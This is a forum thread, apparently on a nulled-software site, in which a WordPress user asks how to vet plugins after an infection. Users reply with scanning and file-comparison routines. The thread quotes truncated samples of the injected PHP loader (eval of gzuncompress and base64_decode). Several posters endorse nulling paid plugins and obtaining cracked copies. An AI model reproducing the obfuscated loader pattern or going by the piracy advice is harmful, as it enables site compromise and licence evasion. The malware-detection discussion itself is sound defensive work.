(ask) how to check wp plugin are free from virus, malware etc...

andrewtane

andrewtane

Active member
Feb 3, 2019
183
76
28
Spore
Hi all,

Recent days one of my site was down caused by a wp plugin (got from other marketplace) infected with malware and php injection, and got 100% cpu warning for mail spam. My site are redirect to other site.
all files are injected with this :
<?php eval(gzuncompress(base64_decode('eNqNWflTE9n2/1daauqZIAPZQ7R88xCDwiAoYVEnU6mb7hsSk3TndXckmflOsZTbqDOUC6jlL1IIuOFC1WhZU1YhLjMiKo7Ccxn1X...
and
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy.....

From this I start to learn how to check a wp plugin :
  1. zip and send to trusted online virus scanner, if pass...
  2. check for php injection code
Can you guys share and suggest me your experiences? especially check for injection code, because fixing this is pain to the a.... :)

thank you.
 
Last edited:
  • Like
Reactions: Monk
CyberDeviL

CyberDeviL

Back to Life 🧬
Trusted Uploader
Aug 10, 2018
2,795
10,824
113
Earth
Try to use less plugins (only use those which are actually highly important) . . .
I use 9 plugins for my 2 different themes for WordPress blogs (both are purchased copy, as I many time require customization support from their developers) + 9 plugins (in which 3 are purchased by me (WP Rocket , iThemes Security Pro, WPForms as the're the most important plugins than all & Id never love to use nulled security plugins, come-one atleast use untouched version of them) . . . Rest plugins are from very trusted source like babiato (from tomz only) etc. . . . Then I check them on virus checker tools - - - next i check some of the important .PHP files inside the .zip archive . . . . If nothing found then i proceed for installation . . . . After installation done - I use cPanel's inbuilt Virus Scanner to check the complete Home directory. .

That's all.

(PS: Never use null version of the most important stuffs if untouched versions does the same job + Never use stuffs from them who injects self-branding links . . . You can optionally learn how to null things, ex: I download Yoast SEO Premium untouched version, then i null it myself to remove ads & other nags alerts) . .
 
  • Like
Reactions: babai467, vanzina, purity and 2 others
Monk

Monk

Member
Jan 12, 2019
23
34
13
Los Angeles
I got started with WordPress in 2018, and I learned the hard way that there are creators and there are destroyers. As a design student with no startup cash is of course going to be enticed by nulled code to play with. I was no fool when it came to virus/malware of the app kind.
But never did it come to mind that some evil person would ruin someones work by injecting their hater-code.

Long story short.. While building a personal blog, I wanted to play with a plugin that i could not afford at the time. I wasn't even sure if the thing was going to do what I wanted it to do.

It ended up giving me the WP-VCD malware fuckery.

While the majority of the UX world and my Designfam are all about freebies and shared resources... This person/person(s) cheapshot me with their bullshit during my portfolio crunch-time. It was super nasty and hides itself inside your functions.php

So When I would delete the line of code...
it would actually re-appear... & spread to other files! LOL WUT
I heard stories about entire shared hosting boxes getting infected.
Like all your neighbors catching fire when you microwaved that pizzabagel too long.
So fucked up.

Thankfully, I enjoy research and nerdshit.
I took a beating, but at the end I was wiser for it.
I learned a ton. Experience is king.

I scan everything with tools like VirusTotal (Winja) before it touches my cloud, WordFence is one of the first plugins I install. I use web-based scanners like Sucuri WPScan, and others. I do not use nulled code for professional or personal projects unless It was something bought & given to me by someone I know & trust.

You know, true sharing. Like lending a friend a great music album.
Some things must be experienced first-hand.
Eventually, we buy the stuff & things because we are creators too.

I was finally able to kill the code after reading very helpful blog entries.
I was so salty about the situation, I made my portfolio with pure html.

All of you wp-bloggers are the true heroes.
The Noob Guardians.
Thank you.
 
Last edited:
  • Like
  • Love
Reactions: Kasabian01, criosites, tanierlyons and 1 other person
andrewtane

andrewtane

Active member
Feb 3, 2019
183
76
28
Spore
CyberDeviL said:
Try to use less plugins (only use those which are actually highly important) . . .
I use 9 plugins for my 2 different themes for WordPress blogs (both are purchased copy, as I many time require customization support from their developers) + 9 plugins (in which 3 are purchased by me (WP Rocket , iThemes Security Pro, WPForms as the're the most important plugins than all & Id never love to use nulled security plugins, come-one atleast use untouched version of them) . . . Rest plugins are from very trusted source like babiato (from tomz only) etc. . . . Then I check them on virus checker tools - - - next i check some of the important .PHP files inside the .zip archive . . . . If nothing found then i proceed for installation . . . . After installation done - I use cPanel's inbuilt Virus Scanner to check the complete Home directory. .

That's all.

(PS: Never use null version of the most important stuffs if untouched versions does the same job + Never use stuffs from them who injects self-branding links . . . You can optionally learn how to null things, ex: I download Yoast SEO Premium untouched version, then i null it myself to remove ads & other nags alerts) . .
Click to expand...

Thanks CyberDeviL for sharing your experiences, especially procedure to check and install.
 
  • Like
Reactions: tanierlyons
andrewtane

andrewtane

Active member
Feb 3, 2019
183
76
28
Spore
Monk said:
I got started with WordPress in 2018, and I learned the hard way that there are creators and there are destroyers. As a design student with no startup cash is of course going to be enticed by nulled code to play with. I was no fool when it came to virus/malware of the app kind.
But never did it come to mind that some evil person would ruin someones work by injecting their hater-code.

Long story short.. While building a personal blog, I wanted to play with a plugin that i could not afford at the time. I wasn't even sure if the thing was going to do what I wanted it to do.

It ended up giving me the WP-VCD malware fuckery.

While the majority of the UX world and my Designfam are all about freebies and shared resources... This person/person(s) cheapshot me with their bullshit during my portfolio crunch-time. It was super nasty and hides itself inside your functions.php

So When I would delete the line of code...
it would actually re-appear... & spread to other files! LOL WUT
I heard stories about entire shared hosting boxes getting infected.
Like all your neighbors catching fire when you microwaved that pizzabagel too long.
So fucked up.

Thankfully, I enjoy research and nerdshit. Got my learn on!
I took a beating, but at the end I was wiser for it.
I learned a ton. Experience is king.

I can now open up code and read it like a book.

I scan everything with tools like VirusTotal (Winja) before it touches my cloud, WordFence is one of the first plugins I install. I use web-based scanners like Sucuri WPScan, and others. I do not use nulled code for professional or personal projects unless It was something bought & given to me by someone I know & trust.

You know, true sharing. Like lending a friend a great music album.
Some things must be experienced first-hand.
Eventually, we buy the stuff & things because we are creators too.

I was finally able to kill the code after reading very helpful blog entries.
I was so salty about the situation, I made my portfolio with pure html & bootstrap css in order to pass my course. Kept it old school, because I'm in my 30's now.

All of you wp-bloggers are the true heroes.
The Noob Guardians.
Thank you.
Click to expand...
Yes agree... Experience is King. Your past experiences are happening to me now :)
I surf your links suggestion and got important tools for my need. thank you very much Monk!
 
  • Like
Reactions: tanierlyons and Monk
purity

purity

Well-known member
Trusted Uploader
Nov 4, 2018
665
3,027
100
Gemany
Personally, it's how I make sure I'm safe:

  1. load resources from trusted sources (Babiato, gpl coffee, gpldl)
  2. load untouched resources and null them myself (with instructions from the web)
  3. use security plugins like iThemes Security or the Sucuri Web Scanner
  4. scan resources myself with virustotal before
  5. use other plugins like Hide-My-WP, Bang Vulnerability Scanner and so on
  6. especially test nulled themes in a local environment (Turnkey Linux/Wordpress VM) before installing them on a live server
It would be nice if I could teach myself nulling, But I don't know enough about it.
 
Last edited:
  • Like
Reactions: tanierlyons
CyberDeviL

CyberDeviL

Back to Life 🧬
Trusted Uploader
Aug 10, 2018
2,795
10,824
113
Earth
purity said:
Personally, it's how I make sure I'm safe:

  1. load resources from trusted sources (Babiato, gpl coffee, gpldl)
  2. load untouched resources and zero them myself (with instructions from the web)
  3. use security plugins like iThemes Security or the Sucuri Scanner
  4. scan resources myself with virustotal before
  5. use other plugins like Hide-My-WP, Bang Vulnerability Scanner and so on
  6. especially test nulled themes in a local environment (Turnkey Linux/Wordpress VM) before installing them on a live server
It would be nice if I could teach myself nulling, But I don't know enough about it.
Click to expand...

I have doubts on stuffs of g*l coffee, some of their stuffs are detected by virus total as webscripts injected while the purchased copy is un-detected with same version . . .
I've checked some of my purchased items & compared with them for that earlier.

Makes difference:
For example: the iThemes security pro on babiato matches with purchased copy & doesn't show any virus alert on virustotal , but same version (ex: latest version 5.9.4) on g*lcoffee doesn't quite match & shows virus alert on virus total . . .

MORAL: Everyone who claims the're 100% genuine should be re-verified by your ownself to judge if even there's atleast %1 of their claim is false or not ;) Be wise - take smarter . ..


NOTE: Even on Babiato I've verified some stuffs shared by tomz with my purchased copies, they matches 100% , even the .zip archive is directly from developers (not extracted & repacked).
So his claims "this file is untouched as purchased by me" can be blindly believed" . . .
 
  • Like
Reactions: haksxsx, tanierlyons and purity
purity

purity

Well-known member
Trusted Uploader
Nov 4, 2018
665
3,027
100
Gemany
CyberDeviL said:
I have doubts on stuffs of g*l coffee, some of their stuffs are detected by virus total as webscripts injected while the purchased copy is un-detected with same version . . .
I've checked some of my purchased items & compared with them for that earlier.

Makes difference:
For example: the iThemes security pro on babiato matches with purchased copy & doesn't show any virus alert on virustotal , but same version (ex: latest version 5.9.4) on g*lcoffee doesn't quite match & shows virus alert on virus total . . .

MORAL: Everyone who claims the're 100% genuine should be re-verified by your ownself to judge if even there's atleast %1 of their claim is false or not ;) Be wise - take smarter . ..


NOTE: Even on Babiato I've verified some stuffs shared by tomz with my purchased copies, they matches 100% , even the .zip archive is directly from developers (not extracted & repacked).
So his claims "this file is untouched as purchased by me" can be blindly believed" . . .
Click to expand...


You are right.
Which is also good, is to compare certain php files with tools like beyond compare (windows), but for that you have to make sure you have an untouched version of the plugin / theme, which you can compare.

Many who start small don't have these possibilities and have to trust others like you for example @CyberDeviL @Tomz.

I don't know gpl coffee for long, I only personally had good experiences with it. But of course babiato is the best I know. And very trustable!

We also say "the man is himself" or "do it yourself"
Click to expand...
:)
 
  • Like
Reactions: chriperseo, tanierlyons and CyberDeviL
KomissarMinsky

KomissarMinsky

Active member
Nov 13, 2018
339
128
43
Some good stuff here folks.
Thanks to all of you for giving good solid resources for people for free.
Babiato is only place thats truly clear of all virus that I can find = Kudos @Tomz

One company of mine has an anti spam/protection product we're building out.
Product is designed for ANY type site, and currently we have working WordPress plugin of course.

We Need TESTERS and TEST SITES, so that we can gather more data on how all items work in all types of different business's, locations and hosting types.

Free to test, free for a year on basic and mid levels.

I'll have free available (first 50) after 4/27 date.
If interested pls do let me know thru here with an email address I can forward details to you.

@Tomz if this is in wrong area to post please feel free to move where it needs to go~

Thanks in Advance
 
  • Like
Reactions: nevenx and tanierlyons
nevenx

nevenx

Well-known member
Trusted Uploader
Aug 4, 2018
523
417
63
Mars
hyiptemplates.net
KomissarMinsky said:
Some good stuff here folks.
Thanks to all of you for giving good solid resources for people for free.
Babiato is only place thats truly clear of all virus that I can find = Kudos @Tomz

One company of mine has an anti spam/protection product we're building out.
Product is designed for ANY type site, and currently we have working WordPress plugin of course.

We Need TESTERS and TEST SITES, so that we can gather more data on how all items work in all types of different business's, locations and hosting types.

Free to test, free for a year on basic and mid levels.

I'll have free available (first 50) after 4/27 date.
If interested pls do let me know thru here with an email address I can forward details to you.

@Tomz if this is in wrong area to post please feel free to move where it needs to go~

Thanks in Advance
Click to expand...
count on me
thanks
 
SharkTanker

SharkTanker

Tech Guru
Trusted Uploader
Oct 30, 2018
388
648
93
corporatehitech.com.au
andrewtane said:
Hi all,

Recent days one of my site was down caused by a wp plugin (got from other marketplace) infected with malware and php injection, and got 100% cpu warning for mail spam. My site are redirect to other site.
all files are injected with this :
<?php eval(gzuncompress(base64_decode('eNqNWflTE9n2/1daauqZIAPZQ7R88xCDwiAoYVEnU6mb7hsSk3TndXckmflOsZTbqDOUC6jlL1IIuOFC1WhZU1YhLjMiKo7Ccxn1X...
and
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy.....

From this I start to learn how to check a wp plugin :
  1. zip and send to trusted online virus scanner, if pass...
  2. check for php injection code
Can you guys share and suggest me your experiences? especially check for injection code, because fixing this is pain to the a.... :)

thank you.
Click to expand...
Hello @andrewtane,

I guess there is no need for me to put any time in writing anything else, the above ladies and gentlemen did a great job already :D
 
kada

kada

New member
Apr 15, 2019
10
3
3
purity said:
Personally, it's how I make sure I'm safe:

  1. load resources from trusted sources (Babiato, gpl coffee, gpldl)
  2. load untouched resources and null them myself (with instructions from the web)
  3. use security plugins like iThemes Security or the Sucuri Web Scanner
  4. scan resources myself with virustotal before
  5. use other plugins like Hide-My-WP, Bang Vulnerability Scanner and so on
  6. especially test nulled themes in a local environment (Turnkey Linux/Wordpress VM) before installing them on a live server
It would be nice if I could teach myself nulling, But I don't know enough about it.
Click to expand...
how i can null my copy for wprocket
 
You must log in or register to reply here.

Similar threads

PangeranBima
[ASK] How To Hide Half Posts Wordpress?
Replies
5
Views
493
General Tech Discussion
tradesman
tradesman
M
#DROPPED! #ASK Elementor Addon : POSTS Design Customization - How to Make It Looks Alike Desktop Preview OR If Possible Using Ready to Use Widget
Replies
12
Views
1K
General Tech Discussion
mei2020
M
M
#SOLVED! #ASK Elementor~Wordpress : Have No images? But I Already Add It :(
Replies
14
Views
1K
General Tech Discussion
mei2020
M
M
#ASK Best Wordpress Form Maker: That Preview Images After Uploading the Images
Replies
4
Views
673
General Tech Discussion
xeric
X
M
#DROPPED! #ASK SliderRevolution : How to Set Active The Timer (related: maintenance, construc...)
Replies
3
Views
668
General Tech Discussion
mei2020
M

Latest posts

Forum statistics

Threads
69,460
Messages
909,781
Members
239,526
Latest member
srnaxter

Share this page

Share this page

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Forums Contact us

User Menu

Login
Community platform by XenForo © 2010-2022 XenForo Ltd.
Top Bottom